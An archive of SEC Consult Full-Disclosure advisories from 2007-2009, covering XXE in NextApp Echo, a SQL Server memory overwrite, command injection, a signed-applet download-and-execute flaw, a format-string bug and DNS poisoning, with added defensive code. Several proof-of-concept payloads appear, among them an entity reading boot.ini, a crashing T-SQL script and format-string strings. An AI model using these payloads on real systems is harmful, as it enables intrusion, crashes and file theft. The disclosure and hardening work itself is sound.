permanent link: http://www.sec-consult.com/files/20090305-0_echo_nextapp_xml_injection.txt
=======================================================================

Vendor description:
-------------------
Echo is a platform for building web-based applications that approach the capabilities of rich clients. The applications are developed using a component-oriented and event-driven API, eliminating the need to deal with the page-based nature of browsers. To the developer, Echo works just like a user interface toolkit.

Vulnerability overview:
-----------------------
Unverified XML data is passed from the client (web browser) to the NextApp Echo engine and consequently to an underlying XML parser. This leads to a typical XML injection scenario.

Vulnerability description:
--------------------------
All XML requests for the framework are created by JavaScript and then sent to the server via HTTP POST requests. A typical request looks like the following:

---cut here---
<client-message xmlns="http://www.nextapp.com/products/echo2/climsg" trans-id="3" focus="c_25">
  <message-part xmlns="" processor="EchoPropertyUpdate">
    <property component-id="c_25" name="text">aa</property>
    <property component-id="c_25" name="horizontalScroll" value="0"/>
    <property component-id="c_25" name="verticalScroll" value="0"/>
  </message-part>
  <message-part xmlns="" processor="EchoAction">
    <action component-id="c_25" name="action"/>
  </message-part>
</client-message>
---cut here---

By manipulating the POST content it is possible to inject arbitrary XML declarations and tags.

Proof of concept:
-----------------
The following entity declaration would create a new XML entity with the content of the boot.ini file, which can then be referenced in the remaining content of the XML request:

---cut here---
<?xml version="1.0"?>
<!DOCTYPE sec [
  <!ELEMENT sec ANY>
  <!ENTITY mytestentity SYSTEM "file:///c:\boot.ini">
]>
---cut here---

Vulnerable versions:
--------------------
NextApp Echo v2.1.0.rc2

Vendor contact timeline:
------------------------
2009/02/16: Vendor notified via email
2009/02/24: Patch available

Patch:
------
The vendor has released an update which addresses the vulnerability. The update can be downloaded at:
http://echo.nextapp.com/site/node/5742

EOF SEC Consult Vulnerability Lab / @2009
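The entity declaration above only does damage if the server-side parser accepts a DOCTYPE in a client message and resolves the external entity when the message body references it. The following is an added example written for this page (not NextApp's code and not the vendor's fix): it rebuilds the advisory's client message, prepends the advisory's entity declaration and references the entity from the text property, and then shows a receiving parser that rejects any DOCTYPE before the document is processed, which is the narrowest fix for this bug class since a client message never legitimately carries one. The expat pre-pass and the property-extraction logic are the editor's; the message format is reproduced from the advisory.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

CLIMSG_NS = "http://www.nextapp.com/products/echo2/climsg"

# Constructed client message with the same shape as the one in the advisory.
LEGIT_MESSAGE = (
    f'<client-message xmlns="{CLIMSG_NS}" trans-id="3" focus="c_25">'
    '<message-part xmlns="" processor="EchoPropertyUpdate">'
    '<property component-id="c_25" name="text">aa</property>'
    '<property component-id="c_25" name="horizontalScroll" value="0"/>'
    '<property component-id="c_25" name="verticalScroll" value="0"/>'
    '</message-part>'
    '<message-part xmlns="" processor="EchoAction">'
    '<action component-id="c_25" name="action"/>'
    '</message-part>'
    '</client-message>'
)

# The same message with the advisory's declaration prepended and the entity
# referenced from the text property: a parser that resolves external entities
# would deliver the contents of boot.ini as the component's new text value.
INJECTED_MESSAGE = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE sec [<!ELEMENT sec ANY>'
    '<!ENTITY mytestentity SYSTEM "file:///c:/boot.ini">]>'
    + LEGIT_MESSAGE.replace(">aa<", ">&mytestentity;<")
)


def reject_doctype(payload):
    """Fail as soon as a DOCTYPE appears. Without a DOCTYPE there can be no
    entity declarations, internal or external, so nothing to resolve."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError(f"DOCTYPE {name!r} is not allowed in a client message")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(payload, True)


def parse_client_message(payload):
    """Return (property_updates, actions) for a client message, or raise
    ValueError if the payload carries a DOCTYPE or is not a client message."""
    reject_doctype(payload)
    root = ET.fromstring(payload)
    if root.tag != f"{{{CLIMSG_NS}}}client-message":
        raise ValueError("root element is not a client-message")
    updates, actions = {}, []
    for part in root.findall("message-part"):       # xmlns="" puts these in no namespace
        processor = part.get("processor")
        if processor == "EchoPropertyUpdate":
            for prop in part.findall("property"):
                value = prop.get("value")
                if value is None:
                    value = prop.text or ""
                updates[(prop.get("component-id"), prop.get("name"))] = value
        elif processor == "EchoAction":
            for action in part.findall("action"):
                actions.append((action.get("component-id"), action.get("name")))
    return updates, actions


def accepts(payload):
    """True if the hardened parser processes the payload, False if it refuses it."""
    try:
        parse_client_message(payload)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(parse_client_message(LEGIT_MESSAGE))
    print("injected message accepted:", accepts(INJECTED_MESSAGE))
```

Refusing the DOCTYPE is deliberately stricter than disabling external entity resolution: it also shuts out internal-entity expansion attacks against the same endpoint, and it costs nothing because the framework's own JavaScript never emits one.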
[Full-disclosure] SEC Consult SA-20090305-1 :: IBM Director CIM Server Remote Denial of Service Vulnerability
SEC-CONSULT Security Advisory 20090305-1
=======================================================================
title: IBM Director CIM Server Remote Denial of Service Vulnerability
program: IBM Director for Windows
vulnerable version: < 5.20.3 Service Update 2
homepage: http://www-03.ibm.com/systems/management/director/
found: Sept. 2008
by: Bernhard Mueller / SEC Consult Vulnerability Lab
permanent link: http://www.sec-consult.com/files/20090305-1_IBM_director_DoS.txt
=======================================================================

Product description:
--------------------
IBM Director is an application that can track and view system configurations of remote computers. It is available for Linux, AIX, and Windows servers.

Vulnerability overview:
-----------------------
The CIM server contained in the IBM Director suite for Microsoft Windows is vulnerable to a remote denial of service attack. The vulnerability allows an attacker to crash the service remotely. It will not be possible to reach the IBM Director agent until the service is manually restarted.

Vulnerability details:
----------------------
The CIM server crashes on receiving requests that contain overlong consumer names. The error condition does not allow for the redirection of program flow.

M-POST /CIMListener/[Ax512] HTTP/1.1
CIMOperation: MethodCall
CIMExport: MethodRequest
CIMExportMethod: ExportIndication

[some xml]

Fix:
----
The vendor has addressed this vulnerability in service update 2 for IBM Director agent 5.20.3.
Download link:
https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=dmp&S_PKG=director_x_520&S_TACT=sms&lang=en_US&cp=UTF-8

Vendor status:
--------------
vendor notified: 2008-11-03
patch available: 2009-03-09

EOF Bernhard Mueller, SEC Consult Vulnerability Lab / @2009
[Full-disclosure] SEC Consult SA-20081219-0 :: Fujitsu-Siemens WebTransactions remote command injection vulnerability
SEC-CONSULT Security Advisory 20081219-0
=======================================================================
title: Fujitsu-Siemens WebTransactions Remote Command Injection Vulnerability
program: WebTransactions
vulnerable version: <= 7.1
homepage: http://www.fujitsu-siemens.com/
found: 05/2008
by: Person at SEC Consult who does not want to be named
permanent link: http://www.sec-consult.com/files/20081219-0_fujitsu-siemens_webta_cmdexec.txt
=======================================================================

Vendor description:
-------------------
With WebTransactions openSEAS provides a product which allows approved host applications to be used in new business processes and modern application scenarios. WebTransactions provides all possibilities to prepare existing host applications for new web based scenarios. Host applications and data can be used via a standard web browser without the need to change anything on the host side.

Vulnerability overview:
-----------------------
Fujitsu-Siemens WebTransactions is vulnerable to remote command injection due to insufficient input validation. Under certain conditions, WBPublish.exe passes unvalidated user input to the system() function when cleaning up temporary session data. This vulnerability allows an attacker to execute arbitrary commands on the affected system. The vulnerability does not require prior authentication and can be exploited from a web browser.

Vulnerability details:
----------------------
A proof of concept exploit will not be released to the public.

Vendor status:
--------------
vendor notified: 2008-05-16
vendor response: 2008-05-16
patch available: 2008-06-18

A patch and vendor advisory for this vulnerability is available at:
http://bs2www.fujitsu-siemens.de/update/securitypatch.htm
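The advisory gives the root cause (request data reaching system() during session cleanup) without details, so the following is an added example of that bug class and its fix, written for this page and not derived from WBPublish.exe or the vendor's patch. vulnerable_cleanup_command shows the string a system()-style cleanup builds from an unvalidated session id and why a hostile id becomes a second command; hardened_cleanup validates the id against a strict alphabet, confines the resulting path to the temporary directory and removes it with file system calls, so no shell is involved at all. The session-id alphabet, the directory layout and the hostile value are the editor's assumptions.

```python
import re
import shutil
import tempfile
from pathlib import Path

# A session identifier is an opaque token; anything outside this alphabet is
# not a session id and must never reach a file operation, let alone a shell.
SESSION_ID_RE = re.compile(r"[A-Za-z0-9_-]{8,64}")


def vulnerable_cleanup_command(tmp_dir, session_id):
    """The bug class the advisory describes: a request value is pasted into a
    command string that is then handed to system(), so shell metacharacters in
    the value are executed as commands of their own."""
    return f"rm -rf {tmp_dir}/{session_id}"


def hardened_cleanup(tmp_dir, session_id):
    """Validate the id, pin the path inside tmp_dir, and delete without a shell.
    Returns the path that was removed (or that did not exist)."""
    if not SESSION_ID_RE.fullmatch(session_id):
        raise ValueError(f"invalid session id: {session_id!r}")
    base = Path(tmp_dir).resolve()
    target = (base / session_id).resolve()
    if target.parent != base:                      # belt and braces after the regex
        raise ValueError("session path escapes the temporary directory")
    if target.is_dir():
        shutil.rmtree(target)
    elif target.exists():
        target.unlink()
    return target


def demo():
    """Create a throwaway session directory, clean it up the safe way, and show
    what the vulnerable string builder produces for a hostile session id.
    Returns (session dir still exists, vulnerable command, hostile id rejected)."""
    tmp = tempfile.mkdtemp(prefix="webta-")
    try:
        session = Path(tmp) / "a1b2c3d4e5f6"
        session.mkdir()
        (session / "state.dat").write_bytes(b"\x00" * 16)
        removed = hardened_cleanup(tmp, "a1b2c3d4e5f6")
        still_exists = removed.exists()

        hostile = "a1b2c3d4; id > /tmp/pwned"      # constructed hostile value
        try:
            hardened_cleanup(tmp, hostile)
            rejected = False
        except ValueError:
            rejected = True
        return still_exists, vulnerable_cleanup_command("/var/tmp/webta", hostile), rejected
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

If a separate process really is required (for example a vendor tool that must do the deletion), the same rule applies: validate first, then pass an argument list to subprocess.run with shell=False so the id is a single argv entry and never interpreted by a shell.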
[Full-disclosure] Microsoft SQL Server 2005 sp_replwritetovarbin memory overwrite (update to SEC Consult SA-20081209)
Update to SEC Consult Security Advisory 20081210-0
(Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability)
=======================================================================

Summary:
--------
By calling the extended stored procedure sp_replwritetovarbin, an attacker can write limited values to arbitrary locations in process memory. This vulnerability has been described in a prior security advisory for MS SQL Server 2000:
http://www.securityfocus.com/archive/1/499042

Moreno Zilli of Swisscom has reported that MS SQL Server 2005 is vulnerable to the same attack. This has been confirmed in a lab test conducted by SEC Consult. Our public security advisory has been updated accordingly:
http://www.sec-consult.com/files/20081209_mssql-sp_replwritetovarbin_memwrite.txt

Workaround:
-----------
Remove the sp_replwritetovarbin extended stored procedure. Run the following as an administrator:

execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'

See also: Removing an Extended Stored Procedure from SQL Server
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx

Patch:
------
According to an email received from Microsoft in September, a fix for this vulnerability has been completed. The release schedule for this fix is currently unknown.

Vendor timeline:
----------------
Vendor notified: 2008-04-17
Vendor response: 2008-04-17
Last response from Microsoft: 09-29-2008
Request for update status 1: 10-14-2008
Request for update status 2: 10-29-2008
Request for update status 3: 11-12-2008
Request for update status 4 and prenotification about advisory release date: 11-28-2008
Public release: 12-09-2008
Update (added MS-SQL 2005): 12-10-2008

EOF Bernhard Mueller / @2008
[Full-disclosure] SEC Consult SA-20081109-0 :: Microsoft SQL Server 2000 sp_replwritetovarbin limited memory overwrite vulnerability
SEC Consult Security Advisory 20081209-0
=======================================
title: Microsoft SQL Server 2000 sp_replwritetovarbin limited memory overwrite vulnerability
program: Microsoft SQL Server 2000
vulnerable version: <= 8.00.2039
homepage: www.microsoft.com
found: 2008-04-12
by: Bernhard Mueller (SEC Consult Vulnerability Lab)
perm. link: http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt
=======================================

Product description:
---
Microsoft SQL Server is a relational database management system (RDBMS) produced by Microsoft. Its primary query language is Transact-SQL, an implementation of the ANSI/ISO standard Structured Query Language (SQL) used by both Microsoft and Sybase.

Vulnerability overview:
---
By calling the extended stored procedure sp_replwritetovarbin and supplying several uninitialized variables as parameters, it is possible to trigger a memory write to a controlled location. Depending on the underlying Windows version, it may be possible to use this vulnerability to execute arbitrary code in the context of the vulnerable SQL Server process.

In a default configuration, sp_replwritetovarbin can be executed by any database user. The vulnerability can therefore be exploited by an authenticated user with a direct database connection, or via SQL injection in a vulnerable web application.

Vulnerability details:
---
The following T-SQL script can be used to test for the vulnerability:

DECLARE @buf NVARCHAR(4000), @val NVARCHAR(4), @counter INT
SET @buf = '
declare @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int, @buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1, @end_offset output, @vb_buffer output, @vb_bufferlen output,'''
SET @val = CHAR(0x41)
SET @counter = 0
WHILE @counter < 3000
BEGIN
    SET @counter = @counter + 1
    SET @buf = @buf + @val
END
SET @buf = @buf + ''',''1'',''1'',''1'', ''1'',''1'',''1'',''1'',''1'',''1'''
EXEC master..sp_executesql @buf

This triggers an access violation exception (write to address 0x41414141).

The vulnerability has been successfully used to execute arbitrary code on a lab machine. SEC Consult will not release code execution exploits for this vulnerability to the public.

Workaround:
---
Remove the sp_replwritetovarbin extended stored procedure. Run the following as an administrator:

execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'

See also: Removing an Extended Stored Procedure from SQL Server
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx

Patch:
---
According to an e-mail received from Microsoft in September, a fix for this vulnerability has been completed. The release schedule for this fix is currently unknown.

Vendor timeline:
---
Vendor notified: 2008-04-17
Vendor response: 2008-04-17
Last response from Microsoft: 2008-09-29
Request for update status 1: 2008-10-14
Request for update status 2: 2008-10-29
Request for update status 3: 2008-11-12
Request for update status 4 and prenotification about advisory release date: 2008-11-28
Public release: 2008-12-09

--
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2008

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
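Until the procedure is dropped, the injection path is the one a defender can watch. The following is an added example, not part of the advisory or of any SEC Consult tooling: a check that a web application or database proxy can run over outgoing T-SQL before it reaches the server. It folds the statement to lowercase identifier characters so that quoting, whitespace, schema prefixes and '+' string concatenation cannot hide the procedure name. The sample statements are constructed for this example; the first is the opening of the advisory's own test script.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Name of the extended stored procedure from the advisory. */
static const char SUSPECT_PROC[] = "sp_replwritetovarbin";

/*
 * Fold a T-SQL statement to lowercase [a-z0-9_] only, dropping every other
 * byte. Quoting, whitespace, schema prefixes and '+' concatenation then cannot
 * hide the name: 'sp_repl' + 'WriteToVarbin' folds to sp_replwritetovarbin.
 * Returns a malloc'd NUL-terminated string (caller frees), or NULL on OOM.
 */
char *fold_tsql(const char *stmt)
{
    char *out = malloc(strlen(stmt) + 1);
    if (out == NULL)
        return NULL;
    size_t n = 0;
    for (const unsigned char *p = (const unsigned char *)stmt; *p; p++) {
        if (isalnum(*p) || *p == '_')
            out[n++] = (char)tolower(*p);
    }
    out[n] = '\0';
    return out;
}

/* Returns 1 if the statement references sp_replwritetovarbin, 0 otherwise. */
int mentions_replwritetovarbin(const char *stmt)
{
    char *folded = fold_tsql(stmt);
    if (folded == NULL)
        return 0;
    int hit = strstr(folded, SUSPECT_PROC) != NULL;
    free(folded);
    return hit;
}

/* Constructed sample statements (not taken from any real log). The first is
 * the start of the advisory's test script, the third hides the name behind
 * mixed case and string concatenation, the fourth is an injected tail. */
static const char *const SAMPLES[] = {
    "exec master.dbo.sp_replwritetovarbin 1, @end_offset output, @vb_buffer output",
    "SELECT name FROM products WHERE id = 42",
    "EXEC master..sp_executesql N'exec   SP_REPL' + 'writetovarbin 1, @a output'",
    "' ; exec master..sp_replwritetovarbin 1,@a out,@b out,@c out,'AAAA' --",
};

/* Number of samples the check flags. */
int count_flagged_samples(void)
{
    int hits = 0;
    for (size_t i = 0; i < sizeof SAMPLES / sizeof SAMPLES[0]; i++)
        hits += mentions_replwritetovarbin(SAMPLES[i]);
    return hits;
}

int main(void)
{
    for (size_t i = 0; i < sizeof SAMPLES / sizeof SAMPLES[0]; i++)
        printf("%s %s\n", mentions_replwritetovarbin(SAMPLES[i]) ? "FLAG" : "pass", SAMPLES[i]);
    return 0;
}
```

The folding defeats the cheap obfuscations but not a name assembled byte by byte with CHAR() at runtime, as the advisory's own script does for its payload; that is why the check is a monitoring aid and the workaround above (dropping the procedure) remains the actual fix.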
[Full-disclosure] SEC Consult SA-20081016-0 :: Remote command execution in Instant Expert Analysis
SEC Consult Security Advisory 20081016-0
=======================================
title: Remote command execution in Instant Expert Analysis signed Java applet and signed ActiveX control
program: Instant Expert Analysis
vendor: Husdawg, LLC
impact: Critical
homepage: http://www.systemrequirementslab.com
found: 2008-04-19
by: David Matscheko / SEC Consult / www.sec-consult.com
=======================================

Vendor description:
---
Instant Expert Analysis is a patent-pending technology that allows websites to have a one-click method for rapidly analyzing a user's hardware and software. The results are then instantaneously compared to a comprehensive database of requirements. Instant Expert Analysis has been proven effective by millions of users on sites run by NVIDIA, Activision, Electronic Arts UK, Eidos, CNET, IGN, and AMD.
[source: http://www.husdawg.com/systemrequirementslab/Home2.html]

Vulnerability overview:
---
Instant Expert Analysis uses a signed Java applet for Firefox or Netscape browsers and a signed ActiveX control for Internet Explorer. Both components allow an attacker to download and execute arbitrary applications when the user visits an attacker-controlled website. If the user has already accepted the applet on a legitimate site, no user interaction is needed to perform this attack: because the components are signed by a trusted source, the browser's default behaviour is to ask only the first time.

Vulnerability description:
---
The Init method of sysreqlab2.jar or sysreqlab2.cab can be called from JavaScript like this:

document.SysReqLab.Init("http://www.example.com", "abc");

The component then downloads and executes a DLL from http://www.systemrequirementslab.com. That DLL loads a setup_abc.exe, setup_mz_abc.exe or setup_ie_abc.exe from the location given in the Init call (i.e. the attacker's website) and executes it.

Proof of concept:
---
The attacker can serve the following files from any host:

setup_abc.exe
setup_ie_abc.exe
setup_mz_abc.exe
sysreqlab2.cab
sysreqlab2.jar
exploit.html

The setup_*.exe files are the trojan applications.

== The full proof of concept has been removed from the public version of this advisory. ==

Vulnerable versions:
---
No version information could be found for the affected files.

Vendor contact timeline:
---
2008-05-08: Vulnerability information sent to vendor ([EMAIL PROTECTED])
2008-06-20: We got informed that the main component has been updated, and a kill bit process has been initiated with Microsoft.
2008-08-13: Received e-mail from vendor that a case has been opened by Microsoft.
2008-10-13: SEC Consult requests an update from Husdawg on how the kill bit process is going and informs Husdawg that a public advisory will be released on October 20th 2008.
2008-10-14: A US-CERT vulnerability note is released, crediting Andre Protas of eEye Digital Security and Greg Linares. SEC Consult has not been prenotified about the release and has not been credited by the vendor or other parties involved.

Workaround:
---
Block the ActiveX control from Husdawg, LLC and don't run it. Remove the certificate of the Java applet from Husdawg, LLC from Control Panel / Java / Security / Certificates / Trusted Certificates and don't allow the applet to run.

Patch:
---
An update is available from the vendor:
http://www.systemrequirementslab.com/bulletins/security_bulletin_1.html

Additionally, the kill bit for the affected ActiveX component has been set by Microsoft:
http://www.microsoft.com/technet/security/advisory/956391.mspx

SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF David Matscheko / @2008
[Full-disclosure] Whitepaper: DNS zone redelegation
Newly emerging techniques of DNS cache poisoning have caused quite a stir recently, prompting security researchers to speculate on the nature of the issue, and naturally inducing press stunts by some individuals, including accidental information leaks and hasty exploit releases. Many other, more relaxed researchers, who had figured out the attack and had coded working exploits within a few hours (which, by the way, was incredibly easy to do, knowing that an undocumented attack actually existed), decided to coordinate with Dan Kaminsky, who had organized a huge multi-vendor security patch, and withhold information for the proposed 30 days.

SEC Consult's researchers were among the first to write a working fast cache poisoning exploit, details of which will now be published in a whitepaper, which also includes some calculations on the reliability of the attack.

The paper details a way of making DNS cache poisoning / response spoofing attacks more reliable. A caching server will store any NS delegation RRs if it receives a delegation which is closer to the answer than the nameservers it already knows. By spoofing replies that contain a delegation for a single node, the nameserver will eventually cache the delegation when we hit the right transaction ID.

http://www.sec-consult.com/whitepapers_e.html

Regards,
Bernhard

--
Bernhard Mueller
Security Consultant
SEC Consult Unternehmensberatung GmbH
www.sec-consult.com
A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax +43 1 8903043 15
mobile +43 676 840301 718
email [EMAIL PROTECTED]
Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Registered office: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt
Advisor for your information security.
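The acceptance rule in the paragraph above, as an added example that is not part of the post or of the whitepaper: a resolver that currently knows the nameservers for some zone will install a new delegation when the offered zone sits on the path from that zone down to the queried name and is strictly closer to it, and a delegation for the queried name itself (a single node) always qualifies. The example models only this name-hierarchy part of the decision; the source address, port and transaction ID checks that the spoofing race has to win are not modelled. All names are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Copy a name without its trailing dot, lowercased. "." and "" both become "". */
static void canon(const char *in, char *out, size_t outlen)
{
    size_t n = strlen(in);
    if (n > 0 && in[n - 1] == '.')
        n--;
    if (n >= outlen)
        n = outlen - 1;
    for (size_t i = 0; i < n; i++)
        out[i] = (char)tolower((unsigned char)in[i]);
    out[n] = '\0';
}

/* Number of labels: "" (root) = 0, "example" = 1, "www.victim.example." = 3. */
int label_count(const char *name)
{
    char c[256];
    canon(name, c, sizeof c);
    if (c[0] == '\0')
        return 0;
    int n = 1;
    for (const char *p = c; *p; p++)
        if (*p == '.')
            n++;
    return n;
}

/* 1 if zone equals name or is one of its ancestors (case-insensitive,
 * matched on label boundaries so "ample" is not an ancestor of "example"). */
int is_ancestor_or_self(const char *zone, const char *name)
{
    char z[256], nm[256];
    canon(zone, z, sizeof z);
    canon(name, nm, sizeof nm);
    size_t zl = strlen(z), nl = strlen(nm);
    if (zl == 0)
        return 1;                         /* the root is above everything */
    if (zl > nl || strcmp(nm + nl - zl, z) != 0)
        return 0;
    return zl == nl || nm[nl - zl - 1] == '.';
}

/*
 * The caching rule the whitepaper leans on: a resolver that already holds the
 * nameservers for cached_zone installs a delegation for offered_zone when that
 * zone lies on the path from cached_zone down to qname and is strictly closer
 * to qname (more labels). A delegation for qname itself satisfies this, which
 * is why the spoofed replies carry one. Returns 1 if accepted, 0 otherwise.
 */
int delegation_is_closer(const char *qname, const char *cached_zone,
                         const char *offered_zone)
{
    if (!is_ancestor_or_self(offered_zone, qname))
        return 0;                         /* not on the path to the answer */
    if (!is_ancestor_or_self(cached_zone, offered_zone))
        return 0;                         /* outside what the cached servers serve */
    return label_count(offered_zone) > label_count(cached_zone);
}

int main(void)
{
    const char *q = "www.victim.example";
    printf("victim.example offered while example is cached:        %d\n",
           delegation_is_closer(q, "example", "victim.example"));
    printf("single node www.victim.example over victim.example:    %d\n",
           delegation_is_closer(q, "victim.example", "www.victim.example"));
    printf("sibling other.example over victim.example:             %d\n",
           delegation_is_closer(q, "victim.example", "other.example"));
    return 0;
}
```

Once the single-node delegation is cached, every later lookup of that name is sent to the attacker's nameserver, so one won race on one name is enough; no further spoofing is needed for the lifetime of the cached NS record.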
[Full-disclosure] Interesting things at sec-consult.com, DNS-whitepaper available tomorrow
Hello,

We recently decided to release some of our research to the public, so selected presentations from our internal tech meetings will from now on be available for download at the SEC Consult website. The presentations (some of which are in German) will include everything from general how-tos to highly specialized pentesting stuff. We will also release a whitepaper on a variant of the new DNS poisoning attack tomorrow. We wrote this whitepaper along with an exploit a while ago, and somehow managed NOT to leak it to the press before the Kaminsky talk :)

The presentations and whitepapers, along with our past presentations from Blackhat and DeepSec, can be found at:
http://www.sec-consult.com/publikationen_e.html

Here are some links to what is already online:

* A German guide to WEP/WPA cracking, by Johannes Greil:
  http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf
* A presentation on the method of using DLL injection to interface to an SSL connection used by a running process (I used this for blackbox-testing certain binary SSL client/server applications):
  http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf
* A short presentation on a method of error-based SQL injection in Sybase databases, by Thomas Kerbl:
  http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf

I hope that some of you will find this useful.

Regards,
Bernhard (Certified Internet Security Superstar)

--
Bernhard Mueller
Security Consultant
SEC Consult Unternehmensberatung GmbH
www.sec-consult.com
A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax +43 1 8903043 15
mobile +43 676 840301 718
email [EMAIL PROTECTED]
Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Registered office: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt
Advisor for your information security.
[Full-disclosure] (no subject)
Hello,

We recently decided to release some of our research to the public, so selected presentations from our internal tech meetings will from now on be available for download at the SEC Consult website. The presentations (some of which are in German) will include everything from general how-tos to highly specialized pentesting stuff. We will also release a whitepaper on a variant of the new DNS poisoning attack tomorrow. We wrote this whitepaper along with an exploit a while ago, and somehow managed NOT to leak it to the press before the Kaminsky talk :)

The presentations and whitepapers, along with our past presentations from Blackhat and DeepSec, can be found at:
http://www.sec-consult.com/publikationen_e.html

Here are some links to what is already online:

* A German guide to WEP/WPA cracking, by Johannes Greil:
  http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf
* A presentation on the method of using DLL injection to interface to an SSL connection used by a running process (I used this for blackbox-testing certain binary SSL client/server applications):
  http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf
* A short presentation on a method of error-based SQL injection in Sybase databases, by Thomas Kerbl:
  http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf

I hope that some of you will find this useful.

Regards,
Bernhard (Certified Internet Security Superstar)

--
Bernhard Mueller
Security Consultant
SEC Consult Unternehmensberatung GmbH
www.sec-consult.com
A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax +43 1 8903043 15
mobile +43 676 840301 718
email [EMAIL PROTECTED]
Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Registered office: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt
Advisor for your information security.
Re: [Full-disclosure] (no subject)
On Wed, 2008-08-06 at 02:26 +0200, Ureleet wrote:
> does that research involve you using a subject line in ur emails?

No, I left it out intentionally to provoke one of your useless posts.

When n3td3v does a pushup, he isn't lifting himself up, he's pushing the Earth down!

--
Bernhard Mueller
Security Consultant
SEC Consult Unternehmensberatung GmbH
www.sec-consult.com
A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax +43 1 8903043 15
mobile +43 676 840301 718
email [EMAIL PROTECTED]
Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Registered office: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt
Advisor for your information security.
[Full-disclosure] Firewire Attack on Windows Vista
Hello,

In the light of recent discussions about FireWire / DMA hacks, we would like to throw in some of the results of our past research on this topic (done mainly by Peter Panholzer) in the form of a short whitepaper. In this paper, we demonstrate that the FireWire unlock attack (as implemented in Adam Boileau's winlockpwn) can be used against Windows Vista.

The paper is available at:
http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf

Best regards,
Bernhard

--
Bernhard Mueller
Security Consultant
SEC Consult Unternehmensberatung GmbH
www.sec-consult.com
A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax +43 1 8903043 15
mobile +43 676 840301 718
email [EMAIL PROTECTED]
Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Registered office: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt
Advisor for your information security.
[Full-disclosure] SEC Consult SA-20071204-0 :: SonicWALL Global VPN Client Format String Vulnerability
SEC Consult Security Advisory 20071204-0
=======================================
title: SonicWALL Global VPN Client Format String Vulnerability
program: SonicWALL Global VPN Client
vulnerable version: < 4.0.0.830
homepage: www.sonicwall.com
found: 2007-06-12
by: lofi42*
perm. link: http://www.sec-consult.com/305.html
=======================================

Vendor description:
---
The SonicWALL Global VPN Client provides mobile users with access to mission-critical network resources by establishing secure connections to their office network's IPSec-compliant SonicWALL VPN gateway.

Vulnerability overview:
---
The SonicWALL Global VPN Client suffers from a format string vulnerability that can be triggered by supplying a specially crafted configuration file. This vulnerability allows an attacker to execute arbitrary code in the context of the vulnerable client. For a successful attack, the attacker would have to entice the victim into importing the crafted configuration file.

Vulnerability details:
---
Format string errors occur when the client parses the name attribute of the <Connection> tag and the content of the <HostName> tags in the configuration file. Examples:

<Connection name="%s%s%s%s">
<HostName>%s%s%s%s</HostName>

The bugs have been verified in version 3.1.556 and beta 4.0.0.810. With version 3.1.556 the client has to initiate a connection to trigger the vulnerability, whereas with version 4.0.0.810 the bug can be exploited by simply double-clicking the configuration file. This can be attributed to the 4.0 version writing the imported configuration to an extra debug log.

Proof-of-concept:
---
In 4.0.0.810, the bug can be beautifully demonstrated by supplying a crafted config file and then viewing the debug logfile. A configuration like this...

<Connection name="AA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x">
<HostName>BB%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x</HostName>

...yields the following logfile:

-- Connection name ---
OnLogMessage(): 'The connection AAe64d20.37327830.46413139.
203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.
6e6f6320.7463656e.206e6f69.41414122.41414141.25414141 has been enabled.' ''
--/Connection name ---

-- HostName ---
